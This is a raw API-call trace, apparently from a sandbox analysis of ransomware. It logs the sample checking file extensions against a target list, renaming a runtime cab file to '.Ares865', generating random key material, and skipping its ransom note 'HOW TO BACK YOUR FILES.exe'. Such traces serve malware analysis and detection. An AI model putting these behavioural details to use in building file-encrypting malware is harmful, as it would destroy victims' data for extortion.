[0074.499] lstrcmpiW (lpString1="cab", lpString2="adp") returned 1 [0074.499] lstrlenW (lpString="alf") returned 3 [0074.499] lstrcmpiW (lpString1="cab", lpString2="alf") returned 1 [0074.500] lstrlenW (lpString="ask") returned 3 [0074.500] lstrcmpiW (lpString1="cab", lpString2="ask") returned 1 [0074.500] lstrlenW (lpString="btr") returned 3 [0074.500] lstrcmpiW (lpString1="cab", lpString2="btr") returned 1 [0074.500] lstrlenW (lpString="cat") returned 3 [0074.500] lstrcmpiW (lpString1="cab", lpString2="cat") returned -1 [0074.500] lstrlenW (lpString="cdb") returned 3 [0074.500] lstrcmpiW (lpString1="cab", lpString2="cdb") returned -1 [0074.500] lstrlenW (lpString="ckp") returned 3 [0074.500] lstrcmpiW (lpString1="cab", lpString2="ckp") returned -1 [0074.500] lstrlenW (lpString="cma") returned 3 [0074.500] lstrcmpiW (lpString1="cab", lpString2="cma") returned -1 [0074.500] lstrlenW (lpString="cpd") returned 3 [0074.500] lstrcmpiW (lpString1="cab", lpString2="cpd") returned -1 [0074.500] lstrlenW (lpString="dacpac") returned 6 [0074.500] lstrcmpiW (lpString1="b1.cab", lpString2="dacpac") returned -1 [0074.500] lstrlenW (lpString="dad") returned 3 [0074.500] lstrcmpiW (lpString1="cab", lpString2="dad") returned -1 [0074.500] lstrlenW (lpString="dadiagrams") returned 10 [0074.500] lstrlenW (lpString="daschema") returned 8 [0074.500] lstrlenW (lpString="db-journal") returned 10 [0074.500] lstrlenW (lpString="db-shm") returned 6 [0074.500] lstrcmpiW (lpString1="b1.cab", lpString2="db-shm") returned -1 [0074.500] lstrlenW (lpString="db-wal") returned 6 [0074.500] lstrcmpiW (lpString1="b1.cab", lpString2="db-wal") returned -1 [0074.500] lstrlenW (lpString="dbc") returned 3 [0074.500] lstrcmpiW (lpString1="cab", lpString2="dbc") returned -1 [0074.500] lstrlenW (lpString="dbs") returned 3 [0074.500] lstrcmpiW (lpString1="cab", lpString2="dbs") returned -1 [0074.500] lstrlenW (lpString="dbt") returned 3 [0074.500] lstrcmpiW (lpString1="cab", lpString2="dbt") returned -1 [0074.500] lstrlenW (lpString="dbv") returned 3 [0074.500] lstrcmpiW (lpString1="cab", lpString2="dbv") returned -1 [0074.501] lstrlenW (lpString="dbx") returned 3 [0074.501] lstrcmpiW (lpString1="cab", lpString2="dbx") returned -1 [0074.501] lstrlenW (lpString="dcb") returned 3 [0074.501] lstrcmpiW (lpString1="cab", lpString2="dcb") returned -1 [0074.501] lstrlenW (lpString="dct") returned 3 [0074.501] lstrcmpiW (lpString1="cab", lpString2="dct") returned -1 [0074.501] lstrlenW (lpString="dcx") returned 3 [0074.501] lstrcmpiW (lpString1="cab", lpString2="dcx") returned -1 [0074.501] lstrlenW (lpString="ddl") returned 3 [0074.501] lstrcmpiW (lpString1="cab", lpString2="ddl") returned -1 [0074.501] lstrlenW (lpString="dlis") returned 4 [0074.501] lstrcmpiW (lpString1=".cab", lpString2="dlis") returned -1 [0074.501] lstrlenW (lpString="dp1") returned 3 [0074.501] lstrcmpiW (lpString1="cab", lpString2="dp1") returned -1 [0074.501] lstrlenW (lpString="dqy") returned 3 [0074.501] lstrcmpiW (lpString1="cab", lpString2="dqy") returned -1 [0074.501] lstrlenW (lpString="dsk") returned 3 [0074.501] lstrcmpiW (lpString1="cab", lpString2="dsk") returned -1 [0074.501] lstrlenW (lpString="dsn") returned 3 [0074.501] lstrcmpiW (lpString1="cab", lpString2="dsn") returned -1 [0074.501] lstrlenW (lpString="dtsx") returned 4 [0074.501] lstrcmpiW (lpString1=".cab", lpString2="dtsx") returned -1 [0074.501] lstrlenW (lpString="dxl") returned 3 [0074.501] lstrcmpiW (lpString1="cab", lpString2="dxl") returned -1 [0074.501] lstrlenW (lpString="eco") returned 3 [0074.501] lstrcmpiW (lpString1="cab", lpString2="eco") returned -1 [0074.501] lstrlenW (lpString="ecx") returned 3 [0074.501] lstrcmpiW (lpString1="cab", lpString2="ecx") returned -1 [0074.501] lstrlenW (lpString="edb") returned 3 [0074.501] lstrcmpiW (lpString1="cab", lpString2="edb") returned -1 [0074.501] lstrlenW (lpString="epim") returned 4 [0074.501] lstrcmpiW (lpString1=".cab", lpString2="epim") returned -1 [0074.501] lstrlenW (lpString="fcd") returned 3 [0074.501] lstrcmpiW (lpString1="cab", lpString2="fcd") returned -1 [0074.501] lstrlenW (lpString="fdb") returned 3 [0074.501] lstrcmpiW (lpString1="cab", lpString2="fdb") returned -1 [0074.501] lstrlenW (lpString="fic") returned 3 [0074.501] lstrcmpiW (lpString1="cab", lpString2="fic") returned -1 [0074.502] lstrlenW (lpString="flexolibrary") returned 12 [0074.502] lstrlenW (lpString="fm5") returned 3 [0074.502] lstrcmpiW (lpString1="cab", lpString2="fm5") returned -1 [0074.502] lstrlenW (lpString="fmp") returned 3 [0074.502] lstrcmpiW (lpString1="cab", lpString2="fmp") returned -1 [0074.502] lstrlenW (lpString="fmp12") returned 5 [0074.502] lstrcmpiW (lpString1="1.cab", lpString2="fmp12") returned -1 [0074.502] lstrlenW (lpString="fmpsl") returned 5 [0074.502] lstrcmpiW (lpString1="1.cab", lpString2="fmpsl") returned -1 [0074.502] lstrlenW (lpString="fol") returned 3 [0074.502] lstrcmpiW (lpString1="cab", lpString2="fol") returned -1 [0074.502] lstrlenW (lpString="fp3") returned 3 [0074.502] lstrcmpiW (lpString1="cab", lpString2="fp3") returned -1 [0074.502] lstrlenW (lpString="fp4") returned 3 [0074.502] lstrcmpiW (lpString1="cab", lpString2="fp4") returned -1 [0074.502] lstrlenW (lpString="fp5") returned 3 [0074.502] lstrcmpiW (lpString1="cab", lpString2="fp5") returned -1 [0074.502] lstrlenW (lpString="fp7") returned 3 [0074.502] lstrcmpiW (lpString1="cab", lpString2="fp7") returned -1 [0074.502] lstrlenW (lpString="fpt") returned 3 [0074.502] lstrcmpiW (lpString1="cab", lpString2="fpt") returned -1 [0074.502] lstrlenW (lpString="frm") returned 3 [0074.502] lstrcmpiW (lpString1="cab", lpString2="frm") returned -1 [0074.502] lstrlenW (lpString="gdb") returned 3 [0074.502] lstrcmpiW (lpString1="cab", lpString2="gdb") returned -1 [0074.502] lstrlenW (lpString="gdb") returned 3 [0074.502] lstrcmpiW (lpString1="cab", lpString2="gdb") returned -1 [0074.502] lstrlenW (lpString="grdb") returned 4 [0074.502] lstrcmpiW (lpString1=".cab", lpString2="grdb") returned -1 [0074.502] lstrlenW (lpString="gwi") returned 3 [0074.502] lstrcmpiW (lpString1="cab", lpString2="gwi") returned -1 [0074.502] lstrlenW (lpString="hdb") returned 3 [0074.502] lstrcmpiW (lpString1="cab", lpString2="hdb") returned -1 [0074.502] lstrlenW (lpString="his") returned 3 [0074.502] lstrcmpiW (lpString1="cab", lpString2="his") returned -1 [0074.502] lstrlenW (lpString="ib") returned 2 [0074.502] lstrcmpiW (lpString1="ab", lpString2="ib") returned -1 [0074.502] lstrlenW (lpString="idb") returned 3 [0074.502] lstrcmpiW (lpString1="cab", lpString2="idb") returned -1 [0074.502] lstrlenW (lpString="ihx") returned 3 [0074.503] lstrcmpiW (lpString1="cab", lpString2="ihx") returned -1 [0074.503] lstrlenW (lpString="itdb") returned 4 [0074.503] lstrcmpiW (lpString1=".cab", lpString2="itdb") returned -1 [0074.503] lstrlenW (lpString="itw") returned 3 [0074.503] lstrcmpiW (lpString1="cab", lpString2="itw") returned -1 [0074.503] lstrlenW (lpString="jet") returned 3 [0074.503] lstrcmpiW (lpString1="cab", lpString2="jet") returned -1 [0074.503] lstrlenW (lpString="jtx") returned 3 [0074.503] lstrcmpiW (lpString1="cab", lpString2="jtx") returned -1 [0074.503] lstrlenW (lpString="kdb") returned 3 [0074.503] lstrcmpiW (lpString1="cab", lpString2="kdb") returned -1 [0074.503] lstrlenW (lpString="kexi") returned 4 [0074.503] lstrcmpiW (lpString1=".cab", lpString2="kexi") returned -1 [0074.503] lstrlenW (lpString="kexic") returned 5 [0074.503] lstrcmpiW (lpString1="1.cab", lpString2="kexic") returned -1 [0074.503] lstrlenW (lpString="kexis") returned 5 [0074.503] lstrcmpiW (lpString1="1.cab", lpString2="kexis") returned -1 [0074.503] lstrlenW (lpString="lgc") returned 3 [0074.503] lstrcmpiW (lpString1="cab", lpString2="lgc") returned -1 [0074.503] lstrlenW (lpString="lwx") returned 3 [0074.503] lstrcmpiW (lpString1="cab", lpString2="lwx") returned -1 [0074.503] lstrlenW (lpString="maf") returned 3 [0074.503] lstrcmpiW (lpString1="cab", lpString2="maf") returned -1 [0074.503] lstrlenW (lpString="maq") returned 3 [0074.503] lstrcmpiW (lpString1="cab", lpString2="maq") returned -1 [0074.503] lstrlenW (lpString="mar") returned 3 [0074.503] lstrcmpiW (lpString1="cab", lpString2="mar") returned -1 [0074.503] lstrlenW (lpString="marshal") returned 7 [0074.503] lstrcmpiW (lpString1="ab1.cab", lpString2="marshal") returned -1 [0074.503] lstrlenW (lpString="mas") returned 3 [0074.503] lstrcmpiW (lpString1="cab", lpString2="mas") returned -1 [0074.503] lstrlenW (lpString="mav") returned 3 [0074.503] lstrcmpiW (lpString1="cab", lpString2="mav") returned -1 [0074.503] lstrlenW (lpString="maw") returned 3 [0074.503] lstrcmpiW (lpString1="cab", lpString2="maw") returned -1 [0074.503] lstrlenW (lpString="mdbhtml") returned 7 [0074.503] lstrcmpiW (lpString1="ab1.cab", lpString2="mdbhtml") returned -1 [0074.503] lstrlenW (lpString="mdn") returned 3 [0074.503] lstrcmpiW (lpString1="cab", lpString2="mdn") returned -1 [0074.504] lstrlenW (lpString="mdt") returned 3 [0074.504] lstrcmpiW (lpString1="cab", lpString2="mdt") returned -1 [0074.504] lstrlenW (lpString="mfd") returned 3 [0074.504] lstrcmpiW (lpString1="cab", lpString2="mfd") returned -1 [0074.504] lstrlenW (lpString="mpd") returned 3 [0074.504] lstrcmpiW (lpString1="cab", lpString2="mpd") returned -1 [0074.504] lstrlenW (lpString="mrg") returned 3 [0074.504] lstrcmpiW (lpString1="cab", lpString2="mrg") returned -1 [0074.504] lstrlenW (lpString="mud") returned 3 [0074.504] lstrcmpiW (lpString1="cab", lpString2="mud") returned -1 [0074.504] lstrlenW (lpString="mwb") returned 3 [0074.504] lstrcmpiW (lpString1="cab", lpString2="mwb") returned -1 [0074.504] lstrlenW (lpString="myd") returned 3 [0074.504] lstrcmpiW (lpString1="cab", lpString2="myd") returned -1 [0074.504] lstrlenW (lpString="ndf") returned 3 [0074.504] lstrcmpiW (lpString1="cab", lpString2="ndf") returned -1 [0074.504] lstrlenW (lpString="nnt") returned 3 [0074.504] lstrcmpiW (lpString1="cab", lpString2="nnt") returned -1 [0074.504] lstrlenW (lpString="nrmlib") returned 6 [0074.504] lstrcmpiW (lpString1="b1.cab", lpString2="nrmlib") returned -1 [0074.504] lstrlenW (lpString="ns2") returned 3 [0074.504] lstrcmpiW (lpString1="cab", lpString2="ns2") returned -1 [0074.504] lstrlenW (lpString="ns3") returned 3 [0074.504] lstrcmpiW (lpString1="cab", lpString2="ns3") returned -1 [0074.504] lstrlenW (lpString="ns4") returned 3 [0074.504] lstrcmpiW (lpString1="cab", lpString2="ns4") returned -1 [0074.504] lstrlenW (lpString="nsf") returned 3 [0074.504] lstrcmpiW (lpString1="cab", lpString2="nsf") returned -1 [0074.504] lstrlenW (lpString="nv") returned 2 [0074.504] lstrcmpiW (lpString1="ab", lpString2="nv") returned -1 [0074.504] lstrlenW (lpString="nv2") returned 3 [0074.504] lstrcmpiW (lpString1="cab", lpString2="nv2") returned -1 [0074.504] lstrlenW (lpString="nwdb") returned 4 [0074.504] lstrcmpiW (lpString1=".cab", lpString2="nwdb") returned -1 [0074.504] lstrlenW (lpString="nyf") returned 3 [0074.504] lstrcmpiW (lpString1="cab", lpString2="nyf") returned -1 [0074.504] lstrlenW (lpString="odb") returned 3 [0074.504] lstrcmpiW (lpString1="cab", lpString2="odb") returned -1 [0074.504] lstrlenW (lpString="odb") returned 3 [0074.504] lstrcmpiW (lpString1="cab", lpString2="odb") returned -1 [0074.505] lstrlenW (lpString="oqy") returned 3 [0074.505] lstrcmpiW (lpString1="cab", lpString2="oqy") returned -1 [0074.505] lstrlenW (lpString="ora") returned 3 [0074.505] lstrcmpiW (lpString1="cab", lpString2="ora") returned -1 [0074.505] lstrlenW (lpString="orx") returned 3 [0074.505] lstrcmpiW (lpString1="cab", lpString2="orx") returned -1 [0074.505] lstrlenW (lpString="owc") returned 3 [0074.505] lstrcmpiW (lpString1="cab", lpString2="owc") returned -1 [0074.505] lstrlenW (lpString="p96") returned 3 [0074.505] lstrcmpiW (lpString1="cab", lpString2="p96") returned -1 [0074.505] lstrlenW (lpString="p97") returned 3 [0074.505] lstrcmpiW (lpString1="cab", lpString2="p97") returned -1 [0074.505] lstrlenW (lpString="pan") returned 3 [0074.505] lstrcmpiW (lpString1="cab", lpString2="pan") returned -1 [0074.505] lstrlenW (lpString="pdb") returned 3 [0074.505] lstrcmpiW (lpString1="cab", lpString2="pdb") returned -1 [0074.505] lstrlenW (lpString="pdm") returned 3 [0074.505] lstrcmpiW (lpString1="cab", lpString2="pdm") returned -1 [0074.505] lstrlenW (lpString="pnz") returned 3 [0074.505] lstrcmpiW (lpString1="cab", lpString2="pnz") returned -1 [0074.505] lstrlenW (lpString="qry") returned 3 [0074.505] lstrcmpiW (lpString1="cab", lpString2="qry") returned -1 [0074.505] lstrlenW (lpString="qvd") returned 3 [0074.505] lstrcmpiW (lpString1="cab", lpString2="qvd") returned -1 [0074.505] lstrlenW (lpString="rbf") returned 3 [0074.505] lstrcmpiW (lpString1="cab", lpString2="rbf") returned -1 [0074.505] lstrlenW (lpString="rctd") returned 4 [0074.505] lstrcmpiW (lpString1=".cab", lpString2="rctd") returned -1 [0074.505] lstrlenW (lpString="rod") returned 3 [0074.505] lstrcmpiW (lpString1="cab", lpString2="rod") returned -1 [0074.505] lstrlenW (lpString="rodx") returned 4 [0074.505] lstrcmpiW (lpString1=".cab", lpString2="rodx") returned -1 [0074.505] lstrlenW (lpString="rpd") returned 3 [0074.505] lstrcmpiW (lpString1="cab", lpString2="rpd") returned -1 [0074.505] lstrlenW (lpString="rsd") returned 3 [0074.505] lstrcmpiW (lpString1="cab", lpString2="rsd") returned -1 [0074.505] lstrlenW (lpString="sas7bdat") returned 8 [0074.505] lstrlenW (lpString="sbf") returned 3 [0074.505] lstrcmpiW (lpString1="cab", lpString2="sbf") returned -1 [0074.506] lstrlenW (lpString="scx") returned 3 [0074.506] lstrcmpiW (lpString1="cab", lpString2="scx") returned -1 [0074.506] lstrlenW (lpString="sdb") returned 3 [0074.506] lstrcmpiW (lpString1="cab", lpString2="sdb") returned -1 [0074.506] lstrlenW (lpString="sdc") returned 3 [0074.506] lstrcmpiW (lpString1="cab", lpString2="sdc") returned -1 [0074.506] lstrlenW (lpString="sdf") returned 3 [0074.506] lstrcmpiW (lpString1="cab", lpString2="sdf") returned -1 [0074.506] lstrlenW (lpString="sis") returned 3 [0074.506] lstrcmpiW (lpString1="cab", lpString2="sis") returned -1 [0074.506] lstrlenW (lpString="spq") returned 3 [0074.506] lstrcmpiW (lpString1="cab", lpString2="spq") returned -1 [0074.506] lstrlenW (lpString="te") returned 2 [0074.506] lstrcmpiW (lpString1="ab", lpString2="te") returned -1 [0074.506] lstrlenW (lpString="teacher") returned 7 [0074.506] lstrcmpiW (lpString1="ab1.cab", lpString2="teacher") returned -1 [0074.506] lstrlenW (lpString="tmd") returned 3 [0074.506] lstrcmpiW (lpString1="cab", lpString2="tmd") returned -1 [0074.506] lstrlenW (lpString="tps") returned 3 [0074.506] lstrcmpiW (lpString1="cab", lpString2="tps") returned -1 [0074.506] lstrlenW (lpString="trc") returned 3 [0074.506] lstrcmpiW (lpString1="cab", lpString2="trc") returned -1 [0074.506] lstrlenW (lpString="trc") returned 3 [0074.506] lstrcmpiW (lpString1="cab", lpString2="trc") returned -1 [0074.506] lstrlenW (lpString="trm") returned 3 [0074.506] lstrcmpiW (lpString1="cab", lpString2="trm") returned -1 [0074.506] lstrlenW (lpString="udb") returned 3 [0074.506] lstrcmpiW (lpString1="cab", lpString2="udb") returned -1 [0074.506] lstrlenW (lpString="udl") returned 3 [0074.506] lstrcmpiW (lpString1="cab", lpString2="udl") returned -1 [0074.506] lstrlenW (lpString="usr") returned 3 [0074.506] lstrcmpiW (lpString1="cab", lpString2="usr") returned -1 [0074.506] lstrlenW (lpString="v12") returned 3 [0074.506] lstrcmpiW (lpString1="cab", lpString2="v12") returned -1 [0074.506] lstrlenW (lpString="vis") returned 3 [0074.506] lstrcmpiW (lpString1="cab", lpString2="vis") returned -1 [0074.506] lstrlenW (lpString="vpd") returned 3 [0074.506] lstrcmpiW (lpString1="cab", lpString2="vpd") returned -1 [0074.506] lstrlenW (lpString="vvv") returned 3 [0074.507] lstrcmpiW (lpString1="cab", lpString2="vvv") returned -1 [0074.507] lstrlenW (lpString="wdb") returned 3 [0074.507] lstrcmpiW (lpString1="cab", lpString2="wdb") returned -1 [0074.507] lstrlenW (lpString="wmdb") returned 4 [0074.507] lstrcmpiW (lpString1=".cab", lpString2="wmdb") returned -1 [0074.507] lstrlenW (lpString="wrk") returned 3 [0074.507] lstrcmpiW (lpString1="cab", lpString2="wrk") returned -1 [0074.507] lstrlenW (lpString="xdb") returned 3 [0074.507] lstrcmpiW (lpString1="cab", lpString2="xdb") returned -1 [0074.507] lstrlenW (lpString="xld") returned 3 [0074.507] lstrcmpiW (lpString1="cab", lpString2="xld") returned -1 [0074.507] lstrlenW (lpString="xmlff") returned 5 [0074.507] lstrcmpiW (lpString1="1.cab", lpString2="xmlff") returned -1 [0074.507] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.Ares865") returned 132 [0074.507] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.Ares865" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab.ares865"), dwFlags=0x1) returned 1 [0074.508] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.Ares865" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.508] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5153816) returned 1 [0074.508] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0074.508] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0074.508] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0074.508] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0074.509] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0074.509] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0074.509] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4ea720, lpName=0x0) returned 0x120 [0074.521] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x400000, dwNumberOfBytesToMap=0xea720) returned 0x2e30000 [0075.301] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0848) returned 1 [0075.302] CryptGenRandom (in: hProv=0x2f0848, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0075.302] CryptReleaseContext (hProv=0x2f0848, dwFlags=0x0) returned 1 [0075.302] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d32b0 [0075.302] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d32b0 | out: hHeap=0x2b0000) returned 1 [0075.302] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0075.302] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0075.302] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0075.302] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0075.302] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0075.302] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0075.302] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0075.302] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0075.302] UnmapViewOfFile (lpBaseAddress=0x2e30000) returned 1 [0075.311] CloseHandle (hObject=0x120) returned 1 [0075.311] CloseHandle (hObject=0x118) returned 1 [0075.311] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0075.311] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0075.311] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0075.320] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c172e60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c172e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0075.320] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0075.320] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48395900, ftCreationTime.dwHighDateTime=0x1ced4da, ftLastAccessTime.dwLowDateTime=0x48395900, ftLastAccessTime.dwHighDateTime=0x1ced4da, ftLastWriteTime.dwLowDateTime=0x48395900, ftLastWriteTime.dwHighDateTime=0x1ced4da, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0075.320] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0075.320] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="aoldtz.exe") returned 1 [0075.320] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2=".") returned 1 [0075.320] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="..") returned 1 [0075.320] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="windows") returned -1 [0075.320] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="bootmgr") returned 1 [0075.320] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="temp") returned 1 [0075.320] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="pagefile.sys") returned 1 [0075.320] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="boot") returned 1 [0075.320] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="ids.txt") returned 1 [0075.320] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="ntuser.dat") returned 1 [0075.320] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="perflogs") returned 1 [0075.320] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="MSBuild") returned 1 [0075.320] lstrlenW (lpString="vc_runtimeAdditional_x86.msi") returned 28 [0075.320] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 124 [0075.320] lstrcpyW (in: lpString1=0x2cce4e8, lpString2="vc_runtimeAdditional_x86.msi" | out: lpString1="vc_runtimeAdditional_x86.msi") returned="vc_runtimeAdditional_x86.msi" [0075.320] lstrlenW (lpString="vc_runtimeAdditional_x86.msi") returned 28 [0075.320] lstrlenW (lpString="Ares865") returned 7 [0075.320] lstrcmpiW (lpString1="x86.msi", lpString2="Ares865") returned 1 [0075.320] lstrlenW (lpString=".dll") returned 4 [0075.320] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2=".dll") returned 1 [0075.320] lstrlenW (lpString=".lnk") returned 4 [0075.320] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2=".lnk") returned 1 [0075.320] lstrlenW (lpString=".ini") returned 4 [0075.320] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2=".ini") returned 1 [0075.320] lstrlenW (lpString=".sys") returned 4 [0075.320] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2=".sys") returned 1 [0075.320] lstrlenW (lpString="vc_runtimeAdditional_x86.msi") returned 28 [0075.320] lstrlenW (lpString="bak") returned 3 [0075.320] lstrcmpiW (lpString1="msi", lpString2="bak") returned 1 [0075.320] lstrlenW (lpString="ba_") returned 3 [0075.320] lstrcmpiW (lpString1="msi", lpString2="ba_") returned 1 [0075.320] lstrlenW (lpString="dbb") returned 3 [0075.321] lstrcmpiW (lpString1="msi", lpString2="dbb") returned 1 [0075.321] lstrlenW (lpString="vmdk") returned 4 [0075.321] lstrcmpiW (lpString1=".msi", lpString2="vmdk") returned -1 [0075.321] lstrlenW (lpString="rar") returned 3 [0075.321] lstrcmpiW (lpString1="msi", lpString2="rar") returned -1 [0075.321] lstrlenW (lpString="zip") returned 3 [0075.321] lstrcmpiW (lpString1="msi", lpString2="zip") returned -1 [0075.321] lstrlenW (lpString="tgz") returned 3 [0075.321] lstrcmpiW (lpString1="msi", lpString2="tgz") returned -1 [0075.321] lstrlenW (lpString="vbox") returned 4 [0075.321] lstrcmpiW (lpString1=".msi", lpString2="vbox") returned -1 [0075.321] lstrlenW (lpString="vdi") returned 3 [0075.321] lstrcmpiW (lpString1="msi", lpString2="vdi") returned -1 [0075.321] lstrlenW (lpString="vhd") returned 3 [0075.321] lstrcmpiW (lpString1="msi", lpString2="vhd") returned -1 [0075.321] lstrlenW (lpString="vhdx") returned 4 [0075.321] lstrcmpiW (lpString1=".msi", lpString2="vhdx") returned -1 [0075.321] lstrlenW (lpString="avhd") returned 4 [0075.321] lstrcmpiW (lpString1=".msi", lpString2="avhd") returned -1 [0075.321] lstrlenW (lpString="db") returned 2 [0075.321] lstrcmpiW (lpString1="si", lpString2="db") returned 1 [0075.321] lstrlenW (lpString="db2") returned 3 [0075.321] lstrcmpiW (lpString1="msi", lpString2="db2") returned 1 [0075.321] lstrlenW (lpString="db3") returned 3 [0075.321] lstrcmpiW (lpString1="msi", lpString2="db3") returned 1 [0075.321] lstrlenW (lpString="dbf") returned 3 [0075.321] lstrcmpiW (lpString1="msi", lpString2="dbf") returned 1 [0075.321] lstrlenW (lpString="mdf") returned 3 [0075.321] lstrcmpiW (lpString1="msi", lpString2="mdf") returned 1 [0075.321] lstrlenW (lpString="mdb") returned 3 [0075.321] lstrcmpiW (lpString1="msi", lpString2="mdb") returned 1 [0075.321] lstrlenW (lpString="sql") returned 3 [0075.321] lstrcmpiW (lpString1="msi", lpString2="sql") returned -1 [0075.321] lstrlenW (lpString="sqlite") returned 6 [0075.321] lstrcmpiW (lpString1="86.msi", lpString2="sqlite") returned -1 [0075.321] lstrlenW (lpString="sqlite3") returned 7 [0075.321] lstrcmpiW (lpString1="x86.msi", lpString2="sqlite3") returned 1 [0075.321] lstrlenW 